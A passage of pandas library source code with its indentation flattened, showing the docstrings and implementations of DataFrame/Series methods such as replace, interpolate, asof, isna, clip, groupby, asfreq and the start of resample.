other views on this object (e.g. a column from a DataFrame).
Returns the caller if this is True.
limit : int, default None
Maximum size gap to forward or backward fill
regex : bool or same types as ``to_replace``, default False
Whether to interpret ``to_replace`` and/or ``value`` as regular
expressions. If this is ``True`` then ``to_replace`` *must* be a
string. Alternatively, this could be a regular expression or a
list, dict, or array of regular expressions in which case
``to_replace`` must be ``None``.
method : string, optional, {'pad', 'ffill', 'bfill'}
The method to use when for replacement, when ``to_replace`` is a
scalar, list or tuple and ``value`` is None.
.. versionchanged:: 0.23.0
Added to DataFrame
See Also
--------
%(klass)s.fillna : Fill NA/NaN values
%(klass)s.where : Replace values based on boolean condition
Returns
-------
filled : %(klass)s
Raises
------
AssertionError
* If ``regex`` is not a ``bool`` and ``to_replace`` is not
``None``.
TypeError
* If ``to_replace`` is a ``dict`` and ``value`` is not a ``list``,
``dict``, ``ndarray``, or ``Series``
* If ``to_replace`` is ``None`` and ``regex`` is not compilable
into a regular expression or is a list, dict, ndarray, or
Series.
* When replacing multiple ``bool`` or ``datetime64`` objects and
the arguments to ``to_replace`` does not match the type of the
value being replaced
ValueError
* If a ``list`` or an ``ndarray`` is passed to ``to_replace`` and
`value` but they are not the same length.
Notes
-----
* Regex substitution is performed under the hood with ``re.sub``. The
rules for substitution for ``re.sub`` are the same.
* Regular expressions will only substitute on strings, meaning you
cannot provide, for example, a regular expression matching floating
point numbers and expect the columns in your frame that have a
numeric dtype to be matched. However, if those floating point
numbers *are* strings, then you can do this.
* This method has *a lot* of options. You are encouraged to experiment
and play with this method to gain intuition about how it works.
Examples
--------
>>> s = pd.Series([0, 1, 2, 3, 4])
>>> s.replace(0, 5)
0 5
1 1
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
... 'B': [5, 6, 7, 8, 9],
... 'C': ['a', 'b', 'c', 'd', 'e']})
>>> df.replace(0, 5)
A B C
0 5 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], 4)
A B C
0 4 5 a
1 4 6 b
2 4 7 c
3 4 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], [4, 3, 2, 1])
A B C
0 4 5 a
1 3 6 b
2 2 7 c
3 1 8 d
4 4 9 e
>>> s.replace([1, 2], method='bfill')
0 0
1 3
2 3
3 3
4 4
dtype: int64
>>> df.replace({0: 10, 1: 100})
A B C
0 10 5 a
1 100 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': 0, 'B': 5}, 100)
A B C
0 100 100 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': {0: 100, 4: 400}})
A B C
0 100 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 400 9 e
>>> df = pd.DataFrame({'A': ['bat', 'foo', 'bait'],
... 'B': ['abc', 'bar', 'xyz']})
>>> df.replace(to_replace=r'^ba.$', value='new', regex=True)
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace({'A': r'^ba.$'}, {'A': 'new'}, regex=True)
A B
0 new abc
1 foo bar
2 bait xyz
>>> df.replace(regex=r'^ba.$', value='new')
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace(regex={r'^ba.$':'new', 'foo':'xyz'})
A B
0 new abc
1 xyz new
2 bait xyz
>>> df.replace(regex=[r'^ba.$', 'foo'], value='new')
A B
0 new abc
1 new new
2 bait xyz
Note that when replacing multiple ``bool`` or ``datetime64`` objects,
the data types in the ``to_replace`` parameter must match the data
type of the value being replaced:
>>> df = pd.DataFrame({'A': [True, False, True],
... 'B': [False, True, False]})
>>> df.replace({'a string': 'new value', True: False}) # raises
TypeError: Cannot compare types 'ndarray(dtype=bool)' and 'str'
This raises a ``TypeError`` because one of the ``dict`` keys is not of
the correct type for replacement.
""")
@Appender(_shared_docs['replace'] % _shared_doc_kwargs)
def replace(self, to_replace=None, value=None, inplace=False, limit=None,
regex=False, method='pad', axis=None):
inplace = validate_bool_kwarg(inplace, 'inplace')
if not is_bool(regex) and to_replace is not None:
raise AssertionError("'to_replace' must be 'None' if 'regex' is "
"not a bool")
if axis is not None:
warnings.warn('the "axis" argument is deprecated '
'and will be removed in'
'v0.13; this argument has no effect')
self._consolidate_inplace()
if value is None:
# passing a single value that is scalar like
# when value is None (GH5319), for compat
if not is_dict_like(to_replace) and not is_dict_like(regex):
to_replace = [to_replace]
if isinstance(to_replace, (tuple, list)):
if isinstance(self, pd.DataFrame):
return self.apply(_single_replace,
args=(to_replace, method, inplace,
limit))
return _single_replace(self, to_replace, method, inplace,
limit)
if not is_dict_like(to_replace):
if not is_dict_like(regex):
raise TypeError('If "to_replace" and "value" are both None'
' and "to_replace" is not a list, then '
'regex must be a mapping')
to_replace = regex
regex = True
items = list(compat.iteritems(to_replace))
keys, values = lzip(*items) or ([], [])
are_mappings = [is_dict_like(v) for v in values]
if any(are_mappings):
if not all(are_mappings):
raise TypeError("If a nested mapping is passed, all values"
" of the top level mapping must be "
"mappings")
# passed a nested dict/Series
to_rep_dict = {}
value_dict = {}
for k, v in items:
keys, values = lzip(*v.items()) or ([], [])
if set(keys) & set(values):
raise ValueError("Replacement not allowed with "
"overlapping keys and values")
to_rep_dict[k] = list(keys)
value_dict[k] = list(values)
to_replace, value = to_rep_dict, value_dict
else:
to_replace, value = keys, values
return self.replace(to_replace, value, inplace=inplace,
limit=limit, regex=regex)
else:
# need a non-zero len on all axes
for a in self._AXIS_ORDERS:
if not len(self._get_axis(a)):
return self
new_data = self._data
if is_dict_like(to_replace):
if is_dict_like(value): # {'A' : NA} -> {'A' : 0}
res = self if inplace else self.copy()
for c, src in compat.iteritems(to_replace):
if c in value and c in self:
# object conversion is handled in
# series.replace which is called recursivelly
res[c] = res[c].replace(to_replace=src,
value=value[c],
inplace=False,
regex=regex)
return None if inplace else res
# {'A': NA} -> 0
elif not is_list_like(value):
keys = [(k, src) for k, src in compat.iteritems(to_replace)
if k in self]
keys_len = len(keys) - 1
for i, (k, src) in enumerate(keys):
convert = i == keys_len
new_data = new_data.replace(to_replace=src,
value=value,
filter=[k],
inplace=inplace,
regex=regex,
convert=convert)
else:
raise TypeError('value argument must be scalar, dict, or '
'Series')
elif is_list_like(to_replace): # [NA, ''] -> [0, 'missing']
if is_list_like(value):
if len(to_replace) != len(value):
raise ValueError('Replacement lists must match '
'in length. Expecting %d got %d ' %
(len(to_replace), len(value)))
new_data = self._data.replace_list(src_list=to_replace,
dest_list=value,
inplace=inplace,
regex=regex)
else: # [NA, ''] -> 0
new_data = self._data.replace(to_replace=to_replace,
value=value, inplace=inplace,
regex=regex)
elif to_replace is None:
if not (is_re_compilable(regex) or
is_list_like(regex) or is_dict_like(regex)):
raise TypeError("'regex' must be a string or a compiled "
"regular expression or a list or dict of "
"strings or regular expressions, you "
"passed a"
" {0!r}".format(type(regex).__name__))
return self.replace(regex, value, inplace=inplace, limit=limit,
regex=True)
else:
# dest iterable dict-like
if is_dict_like(value): # NA -> {'A' : 0, 'B' : -1}
new_data = self._data
for k, v in compat.iteritems(value):
if k in self:
new_data = new_data.replace(to_replace=to_replace,
value=v, filter=[k],
inplace=inplace,
regex=regex)
elif not is_list_like(value): # NA -> 0
new_data = self._data.replace(to_replace=to_replace,
value=value, inplace=inplace,
regex=regex)
else:
msg = ('Invalid "to_replace" type: '
'{0!r}').format(type(to_replace).__name__)
raise TypeError(msg) # pragma: no cover
if inplace:
self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
_shared_docs['interpolate'] = """
Please note that only ``method='linear'`` is supported for
DataFrames/Series with a MultiIndex.
Parameters
----------
method : {'linear', 'time', 'index', 'values', 'nearest', 'zero',
'slinear', 'quadratic', 'cubic', 'barycentric', 'krogh',
'polynomial', 'spline', 'piecewise_polynomial',
'from_derivatives', 'pchip', 'akima'}
* 'linear': ignore the index and treat the values as equally
spaced. This is the only method supported on MultiIndexes.
default
* 'time': interpolation works on daily and higher resolution
data to interpolate given length of interval
* 'index', 'values': use the actual numerical values of the index
* 'nearest', 'zero', 'slinear', 'quadratic', 'cubic',
'barycentric', 'polynomial' is passed to
``scipy.interpolate.interp1d``. Both 'polynomial' and 'spline'
require that you also specify an `order` (int),
e.g. df.interpolate(method='polynomial', order=4).
These use the actual numerical values of the index.
* 'krogh', 'piecewise_polynomial', 'spline', 'pchip' and 'akima'
are all wrappers around the scipy interpolation methods of
similar names. These use the actual numerical values of the
index. For more information on their behavior, see the
`scipy documentation
<http://docs.scipy.org/doc/scipy/reference/interpolate.html#univariate-interpolation>`__
and `tutorial documentation
<http://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html>`__
* 'from_derivatives' refers to BPoly.from_derivatives which
replaces 'piecewise_polynomial' interpolation method in
scipy 0.18
.. versionadded:: 0.18.1
Added support for the 'akima' method
Added interpolate method 'from_derivatives' which replaces
'piecewise_polynomial' in scipy 0.18; backwards-compatible with
scipy < 0.18
axis : {0, 1}, default 0
* 0: fill column-by-column
* 1: fill row-by-row
limit : int, default None.
Maximum number of consecutive NaNs to fill. Must be greater than 0.
limit_direction : {'forward', 'backward', 'both'}, default 'forward'
limit_area : {'inside', 'outside'}, default None
* None: (default) no fill restriction
* 'inside' Only fill NaNs surrounded by valid values (interpolate).
* 'outside' Only fill NaNs outside valid values (extrapolate).
If limit is specified, consecutive NaNs will be filled in this
direction.
.. versionadded:: 0.21.0
inplace : bool, default False
Update the NDFrame in place if possible.
downcast : optional, 'infer' or None, defaults to None
Downcast dtypes if possible.
kwargs : keyword arguments to pass on to the interpolating function.
Returns
-------
Series or DataFrame of same shape interpolated at the NaNs
See Also
--------
reindex, replace, fillna
Examples
--------
Filling in NaNs
>>> s = pd.Series([0, 1, np.nan, 3])
>>> s.interpolate()
0 0
1 1
2 2
3 3
dtype: float64
"""
@Appender(_shared_docs['interpolate'] % _shared_doc_kwargs)
def interpolate(self, method='linear', axis=0, limit=None, inplace=False,
limit_direction='forward', limit_area=None,
downcast=None, **kwargs):
"""
Interpolate values according to different methods.
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if self.ndim > 2:
raise NotImplementedError("Interpolate has not been implemented "
"on Panel and Panel 4D objects.")
if axis == 0:
ax = self._info_axis_name
_maybe_transposed_self = self
elif axis == 1:
_maybe_transposed_self = self.T
ax = 1
else:
_maybe_transposed_self = self
ax = _maybe_transposed_self._get_axis_number(ax)
if _maybe_transposed_self.ndim == 2:
alt_ax = 1 - ax
else:
alt_ax = ax
if (isinstance(_maybe_transposed_self.index, MultiIndex) and
method != 'linear'):
raise ValueError("Only `method=linear` interpolation is supported "
"on MultiIndexes.")
if _maybe_transposed_self._data.get_dtype_counts().get(
'object') == len(_maybe_transposed_self.T):
raise TypeError("Cannot interpolate with all NaNs.")
# create/use the index
if method == 'linear':
# prior default
index = np.arange(len(_maybe_transposed_self._get_axis(alt_ax)))
else:
index = _maybe_transposed_self._get_axis(alt_ax)
if isna(index).any():
raise NotImplementedError("Interpolation with NaNs in the index "
"has not been implemented. Try filling "
"those NaNs before interpolating.")
data = _maybe_transposed_self._data
new_data = data.interpolate(method=method, axis=ax, index=index,
values=_maybe_transposed_self, limit=limit,
limit_direction=limit_direction,
limit_area=limit_area,
inplace=inplace, downcast=downcast,
**kwargs)
if inplace:
if axis == 1:
new_data = self._constructor(new_data).T._data
self._update_inplace(new_data)
else:
res = self._constructor(new_data).__finalize__(self)
if axis == 1:
res = res.T
return res
# ----------------------------------------------------------------------
# Timeseries methods Methods
def asof(self, where, subset=None):
"""
The last row without any NaN is taken (or the last row without
NaN considering only the subset of columns in the case of a DataFrame)
.. versionadded:: 0.19.0 For DataFrame
If there is no good value, NaN is returned for a Series
a Series of NaN values for a DataFrame
Parameters
----------
where : date or array of dates
subset : string or list of strings, default None
if not None use these columns for NaN propagation
Notes
-----
Dates are assumed to be sorted
Raises if this is not the case
Returns
-------
where is scalar
- value or NaN if input is Series
- Series if input is DataFrame
where is Index: same shape object as input
See Also
--------
merge_asof
"""
if isinstance(where, compat.string_types):
from pandas import to_datetime
where = to_datetime(where)
if not self.index.is_monotonic:
raise ValueError("asof requires a sorted index")
is_series = isinstance(self, ABCSeries)
if is_series:
if subset is not None:
raise ValueError("subset is not valid for Series")
elif self.ndim > 2:
raise NotImplementedError("asof is not implemented "
"for {type}".format(type=type(self)))
else:
if subset is None:
subset = self.columns
if not is_list_like(subset):
subset = [subset]
is_list = is_list_like(where)
if not is_list:
start = self.index[0]
if isinstance(self.index, PeriodIndex):
where = Period(where, freq=self.index.freq).ordinal
start = start.ordinal
if where < start:
if not is_series:
from pandas import Series
return Series(index=self.columns, name=where)
return np.nan
# It's always much faster to use a *while* loop here for
# Series than pre-computing all the NAs. However a
# *while* loop is extremely expensive for DataFrame
# so we later pre-compute all the NAs and use the same
# code path whether *where* is a scalar or list.
# See PR: https://github.com/pandas-dev/pandas/pull/14476
if is_series:
loc = self.index.searchsorted(where, side='right')
if loc > 0:
loc -= 1
values = self._values
while loc > 0 and isna(values[loc]):
loc -= 1
return values[loc]
if not isinstance(where, Index):
where = Index(where) if is_list else Index([where])
nulls = self.isna() if is_series else self[subset].isna().any(1)
if nulls.all():
if is_series:
return self._constructor(np.nan, index=where, name=self.name)
elif is_list:
from pandas import DataFrame
return DataFrame(np.nan, index=where, columns=self.columns)
else:
from pandas import Series
return Series(np.nan, index=self.columns, name=where[0])
locs = self.index.asof_locs(where, ~(nulls.values))
# mask the missing
missing = locs == -1
data = self.take(locs, is_copy=False)
data.index = where
data.loc[missing] = np.nan
return data if is_list else data.iloc[-1]
# ----------------------------------------------------------------------
# Action Methods
_shared_docs['isna'] = """
Detect missing values.
Return a boolean same-sized object indicating if the values are NA.
NA values, such as None or :attr:`numpy.NaN`, gets mapped to True
values.
Everything else gets mapped to False values. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.isnull : alias of isna
%(klass)s.notna : boolean inverse of isna
%(klass)s.dropna : omit axes labels with missing values
isna : top-level isna
Examples
--------
Show which entries in a DataFrame are NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.isna()
age born name toy
0 False True False True
1 False False False False
2 True False False False
Show which entries in a Series are NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.isna()
0 False
1 False
2 True
dtype: bool
"""
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return isna(self).__finalize__(self)
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isnull(self):
return isna(self).__finalize__(self)
_shared_docs['notna'] = """
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
NA values, such as None or :attr:`numpy.NaN`, get mapped to False
values.
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.notnull : alias of notna
%(klass)s.isna : boolean inverse of notna
%(klass)s.dropna : omit axes labels with missing values
notna : top-level notna
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notna()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.notna()
0 True
1 True
2 False
dtype: bool
"""
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return notna(self).__finalize__(self)
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notnull(self):
return notna(self).__finalize__(self)
def _clip_with_scalar(self, lower, upper, inplace=False):
if ((lower is not None and np.any(isna(lower))) or
(upper is not None and np.any(isna(upper)))):
raise ValueError("Cannot use an NA value as a clip threshold")
result = self.values
mask = isna(result)
with np.errstate(all='ignore'):
if upper is not None:
result = np.where(result >= upper, upper, result)
if lower is not None:
result = np.where(result <= lower, lower, result)
if np.any(mask):
result[mask] = np.nan
axes_dict = self._construct_axes_dict()
result = self._constructor(result, **axes_dict).__finalize__(self)
if inplace:
self._update_inplace(result)
else:
return result
def _clip_with_one_bound(self, threshold, method, axis, inplace):
inplace = validate_bool_kwarg(inplace, 'inplace')
if axis is not None:
axis = self._get_axis_number(axis)
# method is self.le for upper bound and self.ge for lower bound
if is_scalar(threshold) and is_number(threshold):
if method.__name__ == 'le':
return self._clip_with_scalar(None, threshold, inplace=inplace)
return self._clip_with_scalar(threshold, None, inplace=inplace)
subset = method(threshold, axis=axis) | isna(self)
# GH #15390
# In order for where method to work, the threshold must
# be transformed to NDFrame from other array like structure.
if (not isinstance(threshold, ABCSeries)) and is_list_like(threshold):
if isinstance(self, ABCSeries):
threshold = pd.Series(threshold, index=self.index)
else:
threshold = _align_method_FRAME(self, np.asarray(threshold),
axis)
return self.where(subset, threshold, axis=axis, inplace=inplace)
def clip(self, lower=None, upper=None, axis=None, inplace=False,
*args, **kwargs):
"""
Trim values at input threshold(s).
Assigns values outside boundary to boundary values. Thresholds
can be singular values or array like, and in the latter case
the clipping is performed element-wise in the specified axis.
Parameters
----------
lower : float or array_like, default None
Minimum threshold value. All values below this
threshold will be set to it.
upper : float or array_like, default None
Maximum threshold value. All values above this
threshold will be set to it.
axis : int or string axis name, optional
Align object with lower and upper along the given axis.
inplace : boolean, default False
Whether to perform the operation in place on the data.
.. versionadded:: 0.21.0
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with numpy.
See Also
--------
clip_lower : Clip values below specified threshold(s).
clip_upper : Clip values above specified threshold(s).
Returns
-------
Series or DataFrame
Same type as calling object with the values outside the
clip boundaries replaced
Examples
--------
>>> data = {'col_0': [9, -3, 0, -1, 5], 'col_1': [-2, -7, 6, 8, -5]}
>>> df = pd.DataFrame(data)
>>> df
col_0 col_1
0 9 -2
1 -3 -7
2 0 6
3 -1 8
4 5 -5
Clips per column using lower and upper thresholds:
>>> df.clip(-4, 6)
col_0 col_1
0 6 -2
1 -3 -4
2 0 6
3 -1 6
4 5 -4
Clips using specific lower and upper thresholds per column element:
>>> t = pd.Series([2, -4, -1, 6, 3])
>>> t
0 2
1 -4
2 -1
3 6
4 3
dtype: int64
>>> df.clip(t, t + 4, axis=0)
col_0 col_1
0 6 2
1 -3 -4
2 0 3
3 6 8
4 5 3
"""
if isinstance(self, ABCPanel):
raise NotImplementedError("clip is not supported yet for panels")
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = nv.validate_clip_with_axis(axis, args, kwargs)
if axis is not None:
axis = self._get_axis_number(axis)
# GH 17276
# numpy doesn't like NaN as a clip value
# so ignore
if np.any(pd.isnull(lower)):
lower = None
if np.any(pd.isnull(upper)):
upper = None
# GH 2747 (arguments were reversed)
if lower is not None and upper is not None:
if is_scalar(lower) and is_scalar(upper):
lower, upper = min(lower, upper), max(lower, upper)
# fast-path for scalars
if ((lower is None or (is_scalar(lower) and is_number(lower))) and
(upper is None or (is_scalar(upper) and is_number(upper)))):
return self._clip_with_scalar(lower, upper, inplace=inplace)
result = self
if lower is not None:
result = result.clip_lower(lower, axis, inplace=inplace)
if upper is not None:
if inplace:
result = self
result = result.clip_upper(upper, axis, inplace=inplace)
return result
def clip_upper(self, threshold, axis=None, inplace=False):
"""
Return copy of input with values above given value(s) truncated.
Parameters
----------
threshold : float or array_like
axis : int or string axis name, optional
Align object with threshold along the given axis.
inplace : boolean, default False
Whether to perform the operation in place on the data
.. versionadded:: 0.21.0
See Also
--------
clip
Returns
-------
clipped : same type as input
"""
return self._clip_with_one_bound(threshold, method=self.le,
axis=axis, inplace=inplace)
def clip_lower(self, threshold, axis=None, inplace=False):
"""
Return copy of the input with values below a threshold truncated.
Parameters
----------
threshold : numeric or array-like
Minimum value allowed. All values below threshold will be set to
this value.
* float : every value is compared to `threshold`.
* array-like : The shape of `threshold` should match the object
it's compared to. When `self` is a Series, `threshold` should be
the length. When `self` is a DataFrame, `threshold` should 2-D
and the same shape as `self` for ``axis=None``, or 1-D and the
same length as the axis being compared.
axis : {0 or 'index', 1 or 'columns'}, default 0
Align `self` with `threshold` along the given axis.
inplace : boolean, default False
Whether to perform the operation in place on the data.
.. versionadded:: 0.21.0
See Also
--------
Series.clip : Return copy of input with values below and above
thresholds truncated.
Series.clip_upper : Return copy of input with values above
threshold truncated.
Returns
-------
clipped : same type as input
Examples
--------
Series single threshold clipping:
>>> s = pd.Series([5, 6, 7, 8, 9])
>>> s.clip_lower(8)
0 8
1 8
2 8
3 8
4 9
dtype: int64
Series clipping element-wise using an array of thresholds. `threshold`
should be the same length as the Series.
>>> elemwise_thresholds = [4, 8, 7, 2, 5]
>>> s.clip_lower(elemwise_thresholds)
0 5
1 8
2 7
3 8
4 9
dtype: int64
DataFrames can be compared to a scalar.
>>> df = pd.DataFrame({"A": [1, 3, 5], "B": [2, 4, 6]})
>>> df
A B
0 1 2
1 3 4
2 5 6
>>> df.clip_lower(3)
A B
0 3 3
1 3 4
2 5 6
Or to an array of values. By default, `threshold` should be the same
shape as the DataFrame.
>>> df.clip_lower(np.array([[3, 4], [2, 2], [6, 2]]))
A B
0 3 4
1 3 4
2 6 6
Control how `threshold` is broadcast with `axis`. In this case
`threshold` should be the same length as the axis specified by
`axis`.
>>> df.clip_lower(np.array([3, 3, 5]), axis='index')
A B
0 3 3
1 3 4
2 5 6
>>> df.clip_lower(np.array([4, 5]), axis='columns')
A B
0 4 5
1 4 5
2 5 6
"""
return self._clip_with_one_bound(threshold, method=self.ge,
axis=axis, inplace=inplace)
def groupby(self, by=None, axis=0, level=None, as_index=True, sort=True,
group_keys=True, squeeze=False, **kwargs):
"""
Group series using mapper (dict or key function, apply given function
to group, return result as series) or by a series of columns.
Parameters
----------
by : mapping, function, label, or list of labels
Used to determine the groups for the groupby.
If ``by`` is a function, it's called on each value of the object's
index. If a dict or Series is passed, the Series or dict VALUES
will be used to determine the groups (the Series' values are first
aligned; see ``.align()`` method). If an ndarray is passed, the
values are used as-is determine the groups. A label or list of
labels may be passed to group by the columns in ``self``. Notice
that a tuple is interpreted a (single) key.
axis : int, default 0
level : int, level name, or sequence of such, default None
If the axis is a MultiIndex (hierarchical), group by a particular
level or levels
as_index : boolean, default True
For aggregated output, return object with group labels as the
index. Only relevant for DataFrame input. as_index=False is
effectively "SQL-style" grouped output
sort : boolean, default True
Sort group keys. Get better performance by turning this off.
Note this does not influence the order of observations within each
group. groupby preserves the order of rows within each group.
group_keys : boolean, default True
When calling apply, add group keys to index to identify pieces
squeeze : boolean, default False
reduce the dimensionality of the return type if possible,
otherwise return a consistent type
Returns
-------
GroupBy object
Examples
--------
DataFrame results
>>> data.groupby(func, axis=0).mean()
>>> data.groupby(['col1', 'col2'])['col3'].mean()
DataFrame with hierarchical index
>>> data.groupby(['col1', 'col2']).mean()
Notes
-----
See the `user guide
<http://pandas.pydata.org/pandas-docs/stable/groupby.html>`_ for more.
See also
--------
resample : Convenience method for frequency conversion and resampling
of time series.
"""
from pandas.core.groupby import groupby
if level is None and by is None:
raise TypeError("You have to supply one of 'by' and 'level'")
axis = self._get_axis_number(axis)
return groupby(self, by=by, axis=axis, level=level, as_index=as_index,
sort=sort, group_keys=group_keys, squeeze=squeeze,
**kwargs)
def asfreq(self, freq, method=None, how=None, normalize=False,
fill_value=None):
"""
Convert TimeSeries to specified frequency.
Optionally provide filling method to pad/backfill missing values.
Returns the original data conformed to a new index with the specified
frequency. ``resample`` is more appropriate if an operation, such as
summarization, is necessary to represent the data at the new frequency.
Parameters
----------
freq : DateOffset object, or string
method : {'backfill'/'bfill', 'pad'/'ffill'}, default None
Method to use for filling holes in reindexed Series (note this
does not fill NaNs that already were present):
* 'pad' / 'ffill': propagate last valid observation forward to next
valid
* 'backfill' / 'bfill': use NEXT valid observation to fill
how : {'start', 'end'}, default end
For PeriodIndex only, see PeriodIndex.asfreq
normalize : bool, default False
Whether to reset output index to midnight
fill_value: scalar, optional
Value to use for missing values, applied during upsampling (note
this does not fill NaNs that already were present).
.. versionadded:: 0.20.0
Returns
-------
converted : type of caller
Examples
--------
Start by creating a series with 4 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=4, freq='T')
>>> series = pd.Series([0.0, None, 2.0, 3.0], index=index)
>>> df = pd.DataFrame({'s':series})
>>> df
s
2000-01-01 00:00:00 0.0
2000-01-01 00:01:00 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:03:00 3.0
Upsample the series into 30 second bins.
>>> df.asfreq(freq='30S')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 NaN
2000-01-01 00:03:00 3.0
Upsample again, providing a ``fill value``.
>>> df.asfreq(freq='30S', fill_value=9.0)
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 9.0
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 9.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 9.0
2000-01-01 00:03:00 3.0
Upsample again, providing a ``method``.
>>> df.asfreq(freq='30S', method='bfill')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 2.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 3.0
2000-01-01 00:03:00 3.0
See Also
--------
reindex
Notes
-----
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
"""
from pandas.core.resample import asfreq
return asfreq(self, freq, method=method, how=how, normalize=normalize,
fill_value=fill_value)
def at_time(self, time, asof=False):
"""
Select values at particular time of day (e.g. 9:30AM).
Parameters
----------
time : datetime.time or string
Returns
-------
values_at_time : type of caller
"""
try:
indexer = self.index.indexer_at_time(time, asof=asof)
return self._take(indexer, convert=False)
except AttributeError:
raise TypeError('Index must be DatetimeIndex')
def between_time(self, start_time, end_time, include_start=True,
include_end=True):
"""
Select values between particular times of the day (e.g., 9:00-9:30 AM).
Parameters
----------
start_time : datetime.time or string
end_time : datetime.time or string
include_start : boolean, default True
include_end : boolean, default True
Returns
-------
values_between_time : type of caller
"""
try:
indexer = self.index.indexer_between_time(
start_time, end_time, include_start=include_start,
include_end=include_end)
return self._take(indexer, convert=False)
except AttributeError:
raise TypeError('Index must be DatetimeIndex')
def resample(self, rule, how=None, axis=0, fill_method=None, closed=None,
label=None, convention='start', kind=None, loffset=None,
limit=None, base=0, on=None, level=None):
"""
Convenience method for frequency conversion and resampling of time
series. Object must have a datetime-like index (DatetimeIndex,
PeriodIndex, or TimedeltaIndex), or pass datetime-like values
to the on or level keyword.
Parameters
----------
rule : string
the offset string or object representing target conversion
axis : int, optional, default 0
closed : {'right', 'left'}
Which side of bin interval is closed. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
label : {'right', 'left'}
Which bin edge label to label bucket with. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
convention : {'start', 'end', 's', 'e'}
For PeriodIndex only, controls whether to use the start or end of
`rule`
kind: {'timestamp', 'period'}, optional
Pass 'timestamp' to convert the resulting index to a
``DateTimeIndex`` or 'period' to convert it to a ``PeriodIndex``.
By default the input representation is retained.
loffset : timedelta
Adjust the resampled time labels
base : int, default 0
For frequencies that evenly subdivide 1 day, the "origin" of the
aggregated intervals. For example, for '5min' frequency, base could
range from 0 through 4. Defaults to 0
on : string, optional
For a DataFrame, column to use instead of index for resampling.
Column must be datetime-like.
.. versionadded:: 0.19.0
level : string or int, optional
For a MultiIndex, level (name or number) to use for
resampling. Level must be datetime-like.
.. versionadded:: 0.19.0
Returns
-------
Resampler object
Notes
-----
See the `user guide
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#resampling>`_
for more.
To learn more about the offset strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Examples
--------
Start by creating a series with 9 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=9, freq='T')
>>> series = pd.Series(range(9), index=index)
>>> series
2000-01-01 00:00:00 0
2000-01-01 00:01:00 1
2000-01-01 00:02:00 2
2000-01-01 00:03:00 3
2000-01-01 00:04:00 4
2000-01-01 00:05:00 5
2000-01-01 00:06:00 6
2000-01-01 00:07:00 7
2000-01-01 00:08:00 8
Freq: T, dtype: int64
Downsample the series into 3 minute bins and sum the values
of the timestamps falling into a bin.
>>> series.resample('3T').sum()
2000-01-01 00:00:00 3
2000-01-01 00:03:00 12
2000-01-01 00:06:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but label each
bin using the right edge instead of the left. Please note that the
